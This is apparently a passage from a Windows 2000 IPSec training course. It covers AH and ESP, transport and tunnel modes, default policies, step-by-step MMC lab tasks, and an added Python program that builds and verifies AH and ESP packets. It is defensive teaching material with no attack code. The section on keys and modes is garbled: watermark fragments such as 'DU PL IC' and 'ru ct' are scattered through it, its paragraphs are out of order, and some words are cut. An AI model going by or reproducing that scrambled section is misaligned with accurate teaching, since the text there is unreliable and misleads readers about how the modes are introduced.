Given a running network, you will examine the IPSec structure, cryptography, the Encapsulating Security Payload, the Authentication Header, the Internet Key Exchange, and modes of implementation.

2C Implement and examine IPSec AH configurations.
Given a Windows 2000 computer, you will implement and analyze IPSec AH sessions.

2D Implement and examine IPSec ESP configurations.
Given a Windows 2000 computer, you will implement and analyze IPSec ESP sessions.

2E Implement and examine IPSec AH and ESP configurations.
Given a Windows 2000 computer, you will implement and analyze IPSec AH and ESP sessions.

Topic 2A
Internet Protocol Security
The Internet Protocol (IP) by itself has no security. There are no built-in mechanisms to ensure the security of the packets. It has become possible for attackers to create bogus packets, posing as IP addresses that they are not. It has also become possible for attackers to intercept packets as they are transmitted on the Internet, and read into the payload of the packets. Due to the above-mentioned points, there is no way for the security professional to guarantee any of the following:

That a packet is from the source IP address.
That a packet was not copied or intercepted by a third party during transmission.
That a packet holds the original data that was transmitted.

These issues combine to illustrate that security of the packets themselves is required.

IPSec
IPSec, or IP Security (described in detail in RFC 2401), can provide this security. In the simplest definition, IPSec protects IP datagrams. In a more detailed definition, IPSec provides confidentiality, integrity, and authentication. Confidentiality means there is a system of making the data unreadable by unauthorized individuals.

Integrity means that there is a guarantee that data is not altered between the sender and the receiver. Authentication means that the receiver is guaranteed that the sender is not an imposter.

The way that IPSec is able to provide this protection is by specifying how the network traffic is going to be protected, and to whom the traffic will be sent. The way the traffic is going to be protected will be through an IPSec protocol such as the Authentication Header (AH) or the Encapsulating Security Payload (ESP).

The operation of IPSec is completely transparent to the end-user. This is due to the fact that IPSec functions just above the Network layer (the IPSec protocols AH and ESP have their own IP protocol IDs), so they are well under the Application layer. Providing this automatic protection is significant in the choice of whether or not to implement IPSec. The end result is that network traffic is encrypted on one end and decrypted on the other, without the upper-layer applications at either end worrying about the complexities of the encryption/decryption processes.

Cryptography and Keys


IPSec is able to provide protection by encrypting and decrypting data. Although a detailed discussion of cryptography is beyond the scope of this book, the very basics are required. (A detailed discussion and hands-on study of cryptography and encryption techniques will be undertaken in Level 2 of the SCP.) Any le before encryption is typically referred to as plaintext. Once that le is encrypted, using a mathematical algorithm, it is referred to as ciphertext. In order to decrypt this le (or message), you must have a key that can reverse the encryption. You can think of an encryption algorithm as a lock and the key as the locks combination. If a document is locked, you need a key to unlock it. Often in cryptography, one key is used to lock (encrypt) the document, and the same key or a different key is used to unlock (decrypt) the document, depending upon the methodology chosen. If a different key is used, the two keys are linked to each other via the algorithm and the associated mathematical functions. IPSec requires that users have a method of exchanging (sometimes called negotiating) their keys. One method is called manual distribution. In the simplest denition, this literally means each user manually giving every other user his or her key. Manual distribution will more likely be done with what is called a KDC, or Key Distribution Center.

Ed
T DU PL IC

Modes

st

In

Along with specifying a mode, the actual decision on the use of AH and/or ESP (or the other way around) is required. Since there are two modes of implementation, and two protocols that can be selected, there are four possible methods of protection using IPSec. You can use any of the following: ESP in Transport Mode ESP in Tunnel Mode AH in Transport Mode AH in Tunnel Mode

DO

When Transport Mode is used, the IPSec headers (AH and/or ESP) are inserted between the IP header and the TCP header. When Tunnel Mode is used, the IPSec header is inserted between the original IP header (now tunneled) and a new IP header. Tunnel Mode is commonly used to create VPNs between networks.

NO

The other mode is called Tunnel Mode. In this implementation, IPSec protects the entire (tunneled) IP payload.

ru ct

IPSec has the ability to protect either the complete IP packet or just the upperlayer protocols. The distinction between the two creates two different modes of implementation. One mode is called Transport Mode. In this implementation, IPSec is protecting upper-layer protocols.

or

AT
IPSec Modes and Protocols

The second method is automatic distribution. With automatic distribution, the concept is that keys are exchanged only when needed. The default IPSec implementation of automatic key distribution is called Internet Key Exchange (IKE). You can also implement an automated version of the KDC, such as Kerberos implementation.

Lesson 2: Implementing IPSec

iti

on

cryptography: The art of science concerning the principles, means, and methods for rendering plaintext unintelligible and for converting encrypted messages into intelligible form.

plaintext: Unencrypted data.

key: A symbol or sequence of symbols (or electrical or mechanical correlates of symbols) applied to text in order to encrypt or decrypt.

79
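The header placements just described can be made concrete by building the packets. The following program is an added example written for this page; it is not code from the courseware or from any IPSec implementation. It constructs an AH-in-Transport-Mode packet and an ESP-in-Tunnel-Mode packet using the header formats of RFC 2402 and RFC 2406, computes and checks the AH integrity value the way a receiver must (HMAC-MD5-96 over the datagram with the mutable IP header fields zeroed), and then parses each packet the way a sniffer would, to show what remains readable. The addresses, keys and FTP payload are constructed values, and DES-CBC is replaced by a clearly labelled HMAC-SHA1 keystream so that the program runs on the standard library alone; the byte layout, not the cipher, is what it demonstrates.

```python
"""IPSec header placement and AH integrity, built by hand.

Added example for this lesson, not code from the SCP courseware or from any IPSec
implementation: AH in transport mode and ESP in tunnel mode laid out per RFC 2402/2406,
the AH ICV computed as HMAC-MD5-96 with the mutable IP fields zeroed, and a parse of
what a sniffer can read from each. Addresses, keys and payload are constructed values;
ESP uses a labelled stand-in cipher (HMAC-SHA1 keystream) instead of DES-CBC.
"""
import hashlib
import hmac
import ipaddress
import struct

IPPROTO_TCP, IPPROTO_ESP, IPPROTO_AH = 6, 50, 51

def ip_checksum(hdr):
    """One's-complement checksum over a 20-byte IPv4 header, ignoring its checksum field."""
    words = struct.unpack("!10H", bytes(hdr[:20]))
    total = sum(words) - words[5]
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def ipv4_header(src, dst, proto, payload_len, ttl=64):
    """Plain IPv4 header: version/IHL, TOS, total length, ID, DF flag, TTL, protocol, checksum, addresses."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0x1234, 0x4000, ttl, proto, 0,
                      ipaddress.ip_address(src).packed, ipaddress.ip_address(dst).packed)
    return hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]

def tcp_segment(payload, sport=1025, dport=21):
    """Minimal 20-byte TCP header; the TCP checksum is left zero, it is not the point here."""
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 0x50, 0x18, 8192, 0, 0) + payload

def zero_mutable(ip_hdr):
    """RFC 2402 3.3.3.1: TOS, flags/fragment offset, TTL and checksum are zeroed for the ICV."""
    h = bytearray(ip_hdr)
    h[1], h[6:8], h[8], h[10:12] = 0, b"\0\0", 0, b"\0\0"
    return bytes(h)

def ah_transport(src, dst, tcp, key, spi=0x1000, seq=1):
    """Transport mode: IP | AH | TCP. The ICV also covers the immutable IP header fields."""
    ip = ipv4_header(src, dst, IPPROTO_AH, 24 + len(tcp))
    ah = struct.pack("!BBHII", IPPROTO_TCP, 4, 0, spi, seq)  # Payload Len 4 -> 24-byte AH
    icv = hmac.new(key, zero_mutable(ip) + ah + b"\0" * 12 + tcp, hashlib.md5).digest()[:12]
    return ip + ah + icv + tcp

def verify_ah_transport(pkt, key):
    """Receiver side: recompute HMAC-MD5-96 with mutable fields zeroed and compare to the ICV."""
    ip, ah, icv, tcp = pkt[:20], pkt[20:32], pkt[32:44], pkt[44:]
    expected = hmac.new(key, zero_mutable(ip) + ah + b"\0" * 12 + tcp, hashlib.md5).digest()[:12]
    return hmac.compare_digest(icv, expected)

def keystream_xor(key, iv, data):
    """Stand-in for DES-CBC: HMAC-SHA1 keystream in counter mode; the same call decrypts."""
    out = bytearray()
    for off in range(0, len(data), 20):
        ks = hmac.new(key, iv + struct.pack("!I", off // 20), hashlib.sha1).digest()
        out += bytes(a ^ b for a, b in zip(data[off:off + 20], ks))
    return bytes(out)

def esp_tunnel(gw_src, gw_dst, inner_pkt, enc_key, auth_key, spi=0x2000, seq=1):
    """Tunnel mode: outer IP | ESP(SPI, seq) | IV | {inner IP | TCP | pad | padlen | next=4} | ICV."""
    iv = hashlib.sha1(struct.pack("!I", seq)).digest()[:8]
    pad_len = (-(len(inner_pkt) + 2)) % 4
    plain = inner_pkt + b"\0" * pad_len + bytes([pad_len, 4])  # next header 4 = IP-in-IP
    body = struct.pack("!II", spi, seq) + iv + keystream_xor(enc_key, iv, plain)
    icv = hmac.new(auth_key, body, hashlib.sha1).digest()[:12]  # ESP auth covers ESP only, not outer IP
    return ipv4_header(gw_src, gw_dst, IPPROTO_ESP, len(body) + 12) + body + icv

def esp_tunnel_open(pkt, enc_key, auth_key):
    """Far gateway: check the ICV, decrypt, strip the trailer; returns the inner packet or None."""
    body, icv = pkt[20:-12], pkt[-12:]
    if not hmac.compare_digest(icv, hmac.new(auth_key, body, hashlib.sha1).digest()[:12]):
        return None
    plain = keystream_xor(enc_key, body[8:16], body[16:])
    pad_len, next_hdr = plain[-2], plain[-1]
    return plain[:-(pad_len + 2)] if next_hdr == 4 else None

def eavesdropper_view(pkt):
    """Only the cleartext fields someone with a sniffer can read."""
    seen = {"src": str(ipaddress.ip_address(pkt[12:16])),
            "dst": str(ipaddress.ip_address(pkt[16:20])), "proto": pkt[9]}
    if pkt[9] == IPPROTO_AH:  # AH hides nothing: inner protocol, ports and payload are readable
        seen.update(inner_proto=pkt[20], spi=struct.unpack("!I", pkt[24:28])[0])
        sport, dport = struct.unpack("!HH", pkt[44:48])
        seen.update(sport=sport, dport=dport, payload=pkt[64:])
    elif pkt[9] == IPPROTO_ESP:  # ESP exposes only SPI and sequence number; the rest is ciphertext
        seen.update(zip(("spi", "seq"), struct.unpack("!II", pkt[20:28])))
    return seen

def demo():
    """Constructed scenario: Student_P (172.26.10.1) sends an FTP login to Student_Q (172.26.10.2)."""
    ah_key, enc_key, auth_key = b"constructed-ah-key", b"constructed-esp-enc", b"constructed-esp-auth"
    tcp = tcp_segment(b"USER anonymous\r\n")
    ah_pkt = ah_transport("172.26.10.1", "172.26.10.2", tcp, ah_key)
    hop = bytearray(ah_pkt)  # a router decrements TTL and rewrites the checksum in transit
    hop[8] -= 1
    hop[10:12] = struct.pack("!H", ip_checksum(hop))
    spoof = bytearray(ah_pkt)  # an attacker rewrites the source address
    spoof[12:16] = ipaddress.ip_address("172.26.10.99").packed
    inner = ipv4_header("10.1.1.5", "10.2.2.7", IPPROTO_TCP, len(tcp)) + tcp
    esp_pkt = esp_tunnel("172.26.10.1", "172.26.10.2", inner, enc_key, auth_key)
    return {"ah_ok_after_hop": verify_ah_transport(bytes(hop), ah_key),
            "ah_ok_after_spoof": verify_ah_transport(bytes(spoof), ah_key),
            "ah_seen": eavesdropper_view(ah_pkt), "esp_seen": eavesdropper_view(esp_pkt),
            "esp_inner_recovered": esp_tunnel_open(esp_pkt, enc_key, auth_key) == inner}
```

Running demo() shows the two properties the text describes: the AH packet still verifies after a router has decremented the TTL (the mutable fields are excluded from the ICV) but fails as soon as the source address is rewritten, which is the anti-spoofing guarantee AH adds and ESP in Transport Mode does not; and the ESP tunnel packet yields a sniffer only the two gateway addresses, protocol 50, the SPI and the sequence number.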

Over and above that, ESP offers message integrity (authentication) and confidentiality (encryption), while AH offers only message integrity. There is a difference in what each one authenticates: AH's integrity check covers the whole datagram, including the fields of the IP header that do not change in transit (such as the source and destination addresses), whereas ESP's integrity check covers only the ESP header and its payload, never the IP header in front of it. Tunnel Mode ESP encrypts all of the tunneled data (that is, the tunneled IP header and everything within it), while Transport Mode ESP does not, and cannot, encrypt the IP header. Thus the IPSec implementation that offers the maximum protection is ESP in Tunnel Mode.

ESP in Transport Mode

In Transport Mode, ESP encrypts and authenticates the upper-layer data, such as email, Web pages, and so forth; however, it does not protect the IP addresses. If a packet is captured and analyzed by an attacker, the data is encrypted, but the sender and receiver IP address information is freely available. Both communicating hosts must have IPSec installed and configured.

ESP in Tunnel Mode

In Tunnel Mode, ESP encrypts and authenticates the data just as in Transport Mode. In this situation, the ultimate source and destination IP addresses are also encrypted, because the whole original packet is encapsulated (tunneled). IPSec is implemented on the tunnel endpoints and is not required on the hosts themselves. If this packet is captured and analyzed by an attacker, the attacker can determine only that a packet was sent between the two tunnel endpoints. None of the contents, including the original source and destination, can be read. The external IP header (that of the tunnel endpoints) can, of course, be read.

AH in Transport Mode

AH provides authentication of the datagram: the upper-layer data plus the fields of the IP header that do not change in transit. AH does not provide encryption services like ESP, only authentication services (as the name indicates). In Transport Mode there is a similarity to ESP in that both end hosts must have IPSec installed and configured.

AH in Tunnel Mode

In Tunnel Mode, AH authenticates the entire tunneled packet from one endpoint to another, often network gateways or firewalls. There is no encryption provided, only authentication. Where ESP authentication is turned on, AH is rarely implemented in Tunnel Mode.

authenticate: To establish the validity of a claimed user or object.

firewall: A system or combination of systems that enforces a boundary between two or more networks. A gateway that limits access between networks in accordance with local security policy. The typical firewall is an inexpensive micro-based UNIX box kept clean of critical data, with many modems and public network ports on it, but just one carefully watched connection back to the rest of the cluster.

IPSec Implementation

As you identified in the previous section, there are various modes of implementing IPSec. One of the primary questions to answer is: where are the endpoints in your network going to be? Are the endpoints the actual hosts, or are the endpoints the firewalls?

If true end-to-end security is required between two hosts, then implementing IPSec on each host is the way to go. However, scaling that up to all the hosts in the network can become difficult to implement and manage. Imagine that you and your co-workers all pass open notes to each other in your organization. To prevent a third user from seeing the note sent between any two users, you build an infrastructure of opaque PVC pipes between each pair of co-workers. If there are a total of five workers, you have to have an infrastructure of [5 x (5 - 1)] / 2, or 10 pipes. In this office, each person holds four pipes. Now increase the number of workers to 100. You will need an infrastructure of [100 x (100 - 1)] / 2, or 4950 pipes, and each person holds 99 pipes. That is a lot of secure links to pass things back and forth through, but not very efficient overall.

This is what happens when you implement IPSec in Transport Mode: you basically create many virtual secure pipes between each host and the rest of the hosts.

If host-to-host implementation is chosen, the likely solution will be to use the IPSec function of the OS, such as Windows 2000. In this case IPSec operates inside the host's own IP stack at the Network layer, performing its function and passing the packet on.

Sometimes, though, IPSec may be implemented underneath an existing implementation of the IP protocol stack, between the native IP and the local network drivers (see RFC 2401). This is referred to as a Bump in the Stack implementation.

Yet another option is to use a dedicated piece of hardware. This equipment attaches to an interface or a router and performs the encryption functions externally to the other components. This is called a Bump in the Wire implementation. It offers excellent performance for the processing of encryption and decryption. It is not suitable for all implementations, however, as adding a dedicated physical device to each link may not be a budgetary option for an organization.

TASK 2A-1
Describing the Need for IPSec

1. Why is IPSec becoming a requirement in networks that need secure communication?

There is no security in the standard IP that is used today. IP traffic can be captured, analyzed, and more, with nothing to prevent it. IPSec secures the actual packets themselves, without relying on Application-level encryption.

Topic 2B
IPSec Policy Management

Implementing and managing IPSec policies in Windows is accomplished by using the Microsoft Management Console. In this topic, you will use the MMC to perform the many tasks of IPSec implementation.

The MMC

Microsoft introduced the Microsoft Management Console (MMC) in Windows NT. The MMC is a highly configurable tool used to manage and configure system and application settings.

In the first task, you will become familiar with the MMC configuration options and create some customized settings. The MMC, when you first open it, is blank: you select the configuration options. In Figure 2-1, you will see that there are two menu bars. The first belongs to the overall console, called Console1 by default, and has three menus: Console, Window, and Help. The second belongs to the current console window, whose root node is called Console Root, and has three menus: Action, View, and Favorites.

Figure 2-1: The blank MMC console.

Under Console Root there are two tabs: Tree and Favorites. The Tree tab shows the items that are available in this console. Items can include folders, Web pages, other snap-ins, and more. The Favorites tab is used to manage shortcuts to items in the console tree, so that you can create a customized grouping of the tools and shortcuts you frequently use to manage aspects of your system.

The Tree and Favorites tabs are located in what is called the Left Pane. This is where the options are expanded and selected, and possibly added to Favorites. On the right side of the dividing line is the Right Pane, which shows the details of any object that is selected in the Left Pane.

TASK 2B-1
Examining the MMC

Setup: You are logged on to Windows 2000 Server as Administrator.

1. From the Start menu, choose Run.
2. In the Run box, enter mmc to start the Microsoft Management Console.
3. Choose Console→Add/Remove Snap-In.
4. On the Standalone tab, click Add.
5. Scroll down, select IP Security Policy Management, and click Add.
6. If necessary, select Local Computer, and click Finish.
7. Click Close to close the Add Standalone Snap-in dialog box.
8. Click OK, and leave the MMC open for the next task.

IPSec Policies

In Windows 2000, there are predefined IPSec security policies. These policies allow for implementation of IPSec with minimal effort on the part of the administrator. As an administrator, you must identify the needs for IPSec in your environment, then enable the proper policy to meet those needs. The three predefined policies are:

Client (Respond Only): This policy is used for normal communication, which is not secured. Any Windows 2000 machine (Professional or Server) with this policy enabled will be able to communicate using IPSec if another machine requires or requests it. Such a machine will not ask for IPSec when it initiates communications with any other machine.

Server (Request Security): This policy is used when IP network traffic is to be secured where possible, while still allowing unsecured communication with clients that do not respond to the request. Any Windows 2000 machine (Professional or Server) with this policy enabled will first try to secure communications using IPSec. If the other machine cannot use IPSec, the first machine falls back to unsecured communications. Because of this fallback, a peer that never answers the IKE request ends up talking in cleartext with no indication to the user; a packet capture is the only sure way to tell which sessions were actually protected.

Secure Server (Require Security): This policy is used when all IP network traffic must be secured. Any Windows 2000 machine (Professional or Server) with this policy enabled will always enforce secure communications using IPSec. It will never fall back to unsecured communications.

These policies are also available in Windows XP.

security policies: The set of laws, rules, and practices that regulate how an organization manages, protects, and distributes sensitive information.

TASK 2B-2
Identifying Default IPSec Security Policies

Setup: You are logged on to Windows 2000 Server as Administrator, the MMC is running, and the IP Security Policy Management snap-in has been added.

1. In the left pane, select IP Security Policies On Local Machine. Three policies are shown in the right pane.
2. Examine the three policies to see if any are currently assigned. By default, they are not assigned.
3. Leave the MMC open for the next task.

Saving a Customized MMC

Since you have configured the MMC just as you wish, you should save this configuration so that it is easy to bring back up. Although you could repeat the steps of adding the snap-in each time, doing so is cumbersome and not required.

TASK 2B-3
Saving the Customized MMC Configuration

Setup: You are logged on to Windows 2000 Server as Administrator, the MMC is running, and the IP Security Policy Management snap-in has been added.

1. Choose Console→Exit.
2. When you are asked if you wish to save the console settings, click Yes.
3. Save the file as ipsec.mmc.msc.
4. Verify the new addition by choosing (from the Start menu) Programs→Administrative Tools→ipsec.mmc.msc. Your saved MMC opens just as you customized it.

You will be using this console repeatedly throughout this lesson, so you might want to create a shortcut for it on the Windows Desktop.

The Secure Server (Require Security) Policy

In the following sections, you will examine the settings of each of the three predefined policies. The most secure policy, Secure Server (Require Security), states that all IP communication must be secured. As you will see on its Rules tab, the one predefined exception is ICMP, which this policy permits in the clear.

The General Tab

As the name implies, the General tab provides general information and configuration options for the Secure Server (Require Security) policy.

Figure 2-2: The Key Exchange Security Methods dialog box.

Figure 2-2 shows the settings for Key Exchange. Keys are used as part of the different forms of encryption that can be implemented in the IPSec policy. IKE stands for Internet Key Exchange, and deals with the method of exchanging the cryptographic key(s). SHA1 and MD5 are both algorithms that are used to verify the integrity of a message. 3DES and DES are the actual encryption algorithms that can be used, and finally, the Diffie-Hellman Group dictates the strength of the key exchange itself.

These settings work together to determine the integrity, confidentiality, and strength of the secured communication. Integrity is determined by the SHA1 or MD5 algorithm. Confidentiality is determined by the 3DES or DES algorithm. Strength is determined by the Diffie-Hellman Group: the Low (1) setting uses Diffie-Hellman group 1 with a 768-bit modulus, and the Medium (2) setting uses group 2 with a 1024-bit modulus. The group sets the size of the modulus in which the key exchange is performed; it is not the length of the resulting session key. Prefer 3DES, SHA1 and Medium (2) where the peers support them: DES's 56-bit key is no longer considered adequate against a determined attacker.

These algorithms are discussed in detail in the prerequisite courses.

DES: (Data Encryption Standard) Definition 1: An unclassified crypto algorithm adopted by the National Bureau of Standards for public use. Definition 2: A cryptographic algorithm for the protection of unclassified data, published in Federal Information Processing Standard (FIPS) 46. The DES, which was approved by the National Institute of Standards and Technology (NIST), is intended for public and government use.

TASK 2B-4
Examining Security Methods

Setup: You are logged on to Windows 2000 Server as Administrator, and the ipsec.mmc.msc console is open.

1. In the right pane, right-click Secure Server (Require Security), and choose Properties.
2. Select the General tab.
3. Observe that the default value for Check For Policy Changes Every is 180 minutes. Every 3 hours, the machine (if it is a domain member) will check with Active Directory to see whether this policy, when assigned, has changed.
4. Under Key Exchange Using These Settings, click Advanced.
5. In the Key Exchange Settings dialog box, click Methods.
6. Examine the default settings for the security used in Secure Server (Require Security).
7. Close all windows without changing the properties.

The Rules Tab for the Secure Server (Require Security) Policy

The Rules section of an IPSec policy (in this case, the Secure Server (Require Security) policy) contains the actual security settings of the policy: which traffic it applies to and what is done with that traffic. The IP Filter List defines the types of network traffic that are affected by a rule. The predefined rules in a policy can be modified, but cannot be removed. The default rules are for All IP Traffic, All ICMP Traffic, and <Dynamic>. Paired with each IP Filter List is a Filter Action: what the system does when traffic matches the filter list. The three predefined filter actions are:

Permit: Allow unsecured IP packets to pass.
Request Security (Optional): Negotiate security, but fall back to unsecured communication with computers that do not respond to the request.
Require Security: Negotiate security and never fall back to unsecured communication.

The <Dynamic> rule is the Default Response rule. It follows the negotiation as initiated by the other computer and applies when no other rule does. It is the only rule in the Client (Respond Only) predefined policy.

Note how the predefined rules combine in the Secure Server policy: All IP Traffic uses Require Security, while All ICMP Traffic uses Permit, so ping and other ICMP traffic is never protected by this policy. When more than one filter matches a packet, Windows applies the most specific filter, which is why the narrower ICMP filter takes precedence over All IP Traffic.

Figure 2-3: The default filter lists and filter actions, as shown on the Require Security Rules tab.

In addition to the IP Filter List and the Filter Action on the Rules tab shown in Figure 2-3, there are other sections that deserve noting: the Authentication Methods, Tunnel Setting, and Connection Type options, described in the following section and shown in Figure 2-4. The Authentication Methods define how trust is established between the two communicating hosts. By default, this is the Kerberos method. The other valid options are to use a certificate from a Certificate Authority (CA), or to use a predefined shared key string. The Tunnel Setting defines whether this communication is to use a tunnel and, if so, the IP address of the end of the tunnel. The endpoint is the tunnel computer that is closest to the IP traffic destination. The Connection Type defines the types of connections to which the rule applies. The default setting is All Network Connections; the second option applies the rule only to Local Area Network (LAN) traffic, and the third applies it only to Remote Access traffic.

LAN: (Local Area Network) A computer communications system limited to no more than a few miles and using high-speed connections (2 to 100 megabits per second). A short-haul communications system that connects ADP devices in a building or group of buildings within a few square kilometers, including workstations, front-end processors, controllers, and servers.

TASK 2B-5
Examining Policy Rules

Setup: You are logged on to Windows 2000 Server as Administrator.

1. Reopen the ipsec.mmc.msc console.
2. In the right pane, right-click Secure Server (Require Security), and choose Properties.
3. If necessary, select the Rules tab.

Figure 2-4: The authentication methods, tunnel settings, and connection types, as shown on the Require Security Rules tab.

4. Examine the default settings for IP Filter List, Filter Action, Authentication Methods, Tunnel Setting, and Connection Type.
5. Select the All IP Traffic rule, and click the Edit button.
6. Observe the configuration options that can be adjusted in this section.
7. When you are done reviewing the configuration options, click Cancel twice.
8. Close the ipsec.mmc.msc console, without saving changes.

Topic 2C
IPSec AH Implementation

You now have all of the information and tools you need to implement IPSec. Let's try it out.

About the Tasks

For the following tasks, you will work in pairs. The text and activities refer to the two machines as Student_P and Student_Q. These machines are connected to the classroom hub as well as to each other via a crossover cable. You will disable the interfaces that are connected to the classroom hub and enable the interfaces that are connected to each other. This way, each pair of machines is isolated in its own little network and does not interfere with other student pairs.

Student_P will initiate communications with Student_Q. Student_Q dictates whether it has an IPSec policy enabled and, if so, whether it should request or require Student_P to do the same. On Student_P, at first you will have no IPSec Respond policy activated, but later you will. You will capture traffic between these two computers using Network Monitor, and perform an analysis on the traffic.

You will also use the options for configuring policies. You will use just the AH protocol (authenticity/integrity). Then you will use just the ESP protocol (confidentiality). Following that, you will use AH with ESP. Also, ESP will be configured to use its integrity algorithm. Finally, because the integrity algorithms come in two flavors (SHA-1 or MD5) and the encryption algorithms for confidentiality also come in two flavors (DES or 3DES), you'll use combinations of these.

As a policy maker for a company, you'll have to make such decisions before you implement IPSec. These are the actual tools you can use in Windows 2000 to implement your policies.

TASK 2C-1
Preparing the System Setup and Configuration

Note: Perform this task on all student machines. If you are unsure about the classroom configuration, check with your instructor.

1. Open the Network And Dial-up Connections Control Panel.
2. Disable the Classroom Hub interface.
3. Verify that the Partner interface is enabled.
4. Verify your IP addresses. Generally, if the IP address of the interface connected to the classroom hub is 172.16.10.x or 172.18.10.x, then the IP address of the interface connected via the crossover cable to your partner's machine will be 172.26.10.x or 172.28.10.x.
5. Verify connectivity by pinging your partner's IP address. Both student machines should be able to ping each other successfully.
6. Close all open windows.

Creating Custom IPSec Policies

In the previous topic, you examined the default IPSec policies in Windows 2000. For the remainder of the lesson, you will create and use your own customized IPSec policies. This will enable you to secure network traffic based on your unique configuration requirements. The following figures can be used as a reference while performing the tasks of this section.

Figure 2-5: Opting not to use the Add Wizard.

When you are creating a new policy, you will need to add and configure all the options you previously examined. In these tasks, you will customize the policies one by one, and you do not want to use the Add Wizard, because the Add Wizard walks you through specific predefined steps. At this stage, you want to perform everything manually.

Figure 2-6: The Security Methods tab, showing the leftmost part of the Security Method Preference Order.

During policy creation, you will be presented with the Security Methods tab. Here you will see five columns: Type, AH Integrity, ESP Confidentiality, ESP Integrity, and Key Lifetimes (KB/Sec), though you might need to scroll to see all five.

Figure 2-7: The Security Methods tab, showing the rightmost part of the Security Method Preference Order.

Security methods are listed in the order of preference that this machine will use when negotiating IP Security with another machine that responds that it can use IPSec, too. You can add, edit, or remove any of these methods. In this case, since you will have named this policy 1_REQUEST_AH(md5)_only, you will simplify the list and offer exactly one choice: request IP Security that relies only on AH integrity using the MD5 hashing algorithm. Do not worry about key lifetimes at this stage.

TASK 2C-2
Creating the 1_REQUEST_AH(md5)_only Policy

Note: Perform this task only if you are designated as Student_Q.

1. Open the ipsec.mmc.msc console.
2. In the right pane, right-click and choose Create IP Security Policy, then click Next.
3. For the IP Security Policy Name, enter 1_REQUEST_AH(md5)_only, and click Next.
4. Uncheck Activate The Default Response Rule, and click Next.
5. Uncheck Edit Properties, and click Finish.
6. Double-click the new policy 1_REQUEST_AH(md5)_only.
7. On the Rules tab, uncheck Use Add Wizard, and click Add.
8. On the IP Filter List tab, click the radio button for All IP Traffic.
9. Switch to the Filter Action tab.
10. Click the radio button for Request Security (Optional).
11. Click Edit.
12. Verify that the radio button for Negotiate Security is selected.
13. Read the options presented to you under Security Method Preference Order.
14. Remove all but one Security Method by holding down the Shift key, selecting all but one of the choices, and clicking Remove.
15. When prompted with Are You Sure?, click Yes.
16. Select the remaining method, and click Edit.
17. Under Security Method, click the Settings button found under Custom (For Expert Users), as you're on your way to becoming an expert on IPSec.
18. Verify that AH is checked and that the integrity algorithm is MD5.
19. If necessary, uncheck ESP.
20. Under Session Key Settings, uncheck both check boxes.
21. Click OK three times to return to the New Rule Properties dialog box.
22. Leave the New Rule Properties open for the next task.

When you are creating this customized policy, you are going to use only AH, and not ESP. So, when you are customizing the settings, be sure to uncheck the ESP options and to check the AH options. You should also clear the check boxes for generating new keys, both for size (Kbytes) and time (seconds). Leaving them cleared means you are not setting an explicit rekey interval; that keeps the lab capture simple, but in a production policy you would set one, so that a compromised session key exposes only a bounded amount of traffic.

Editing Authentication Method Policies

Notice that three authentication methods are supported: Kerberos, Certificates, and Preshared Keys. You will use the third method for now, as it is simple to implement. In a production environment, if you have a homogeneous Windows 2000 domain implementation, you could leave it at the default of Kerberos; in a heterogeneous network, you could choose to set up a CA and distribute IPSec certificates. Preshared keys are meant for testing and interoperability work: the key string is stored readable in the policy and has to be identical on every peer, which makes it the weakest of the three choices.

Figure 2-8: The Authentication Method tab.

TASK 2C-3
Editing the 1_REQUEST_AH(md5)_only Policy

Note: Perform this task only if you are designated as Student_Q.

1. Verify that the New Rule Properties are displayed.
2. Select the Authentication Methods tab.
3. Click Edit.
4. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide text for the preshared key. Click OK to close the Edit Authentication Method Properties dialog box.
5. Switch to the Tunnel Setting tab, but leave the settings alone. You will be working in Transport Mode only.
6. Switch to the Connection Type tab, but leave the settings alone. You will use the default of All Network Connections.
7. Click Close to close the Rule Properties. Keep the Policy Properties open for the next task.

Setting Up the Computer's Response

You have just configured a policy where Student_Q will request that any other computer attempting to communicate with it implement AH using the MD5 algorithm. Let's assume that this policy is put into effect, and another computer says that it can communicate with Student_Q by using AH as well. Student_Q should be in a position to respond to this. Therefore, you should now configure the Default Response rule in this policy for Student_Q.

Figure 2-9: Preparing to modify the default response.

To modify the rule, you will not use the Add Wizard. Once you click Edit, you will again be presented with the tabs for Security Methods, Authentication Methods, and Connection Type.

Figure 2-10: Editing Security Methods.

Under Security Methods, you will again see five columns presented: Type, AH Integrity, ESP Confidentiality, ESP Integrity, and Key Lifetimes (KB/Sec). As before, you can add, edit, or remove any of these methods. In this case, the policy is named 1_REQUEST_AH(md5)_only, but because it will also have to respond to the request it made, you'll simplify the list and offer exactly one choice: respond to IP Security that relies only on AH integrity using the MD5 hashing algorithm. As before, you don't need to worry about the key lifetimes.

TASK 2C-4
Configuring the Policy Response

Note: Perform this task only if you are designated as Student_Q.

1. Verify that the properties for the 1_REQUEST_AH(md5)_only policy are displayed.
2. On the Rules tab, check <Dynamic> Default Response, and click Edit. (The Use Add Wizard check box should remain unchecked.)
3. Remove all but one Security Method by holding down the Shift key, selecting all but one of the choices, and clicking Remove.
4. When prompted with Are You Sure?, click Yes.

5. Select the remaining method, and click Edit.
6. Under Security Method, click the Settings button found under Custom (For Expert Users).
7. Verify that the box beside AH is checked and that the integrity algorithm is MD5.
8. Verify that ESP is unchecked.
9. Under Session Key Settings, verify that the options for generating new keys for both size and time are unchecked.
10. Click OK twice to return to the Edit Rule Properties.
11. Switch to the Authentication Methods tab.
12. Click Edit.
13. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.
14. Click OK.
15. Switch to the Connection Type tab, and verify that the setting is the default of All Network Connections.
16. Click OK, and then click Close.
17. Close the ipsec.mmc.msc console, without saving changes.

Configuring AH in Both Directions

You have configured a policy where Student_Q will request other computers that attempt to communicate with it to implement AH by using the MD5 algorithm; Student_Q is also in a position to respond by using this algorithm. Now, let's configure Student_P to follow Student_Q's lead.

TASK 2C-5
Configuring the Second Computer

Note: Perform this task only if you are designated as Student_P.

1. Open the ipsec.mmc.msc console. In the right pane, right-click and choose Create IP Security Policy. Click Next.
2. For the IP Security Policy Name, enter 1_RESPOND_AH(md5)_only, and click Next.
3. Uncheck Activate The Default Response Rule, and click Next.
4. Uncheck Edit Properties, and click Finish.
5. Double-click the new policy 1_RESPOND_AH(md5)_only.
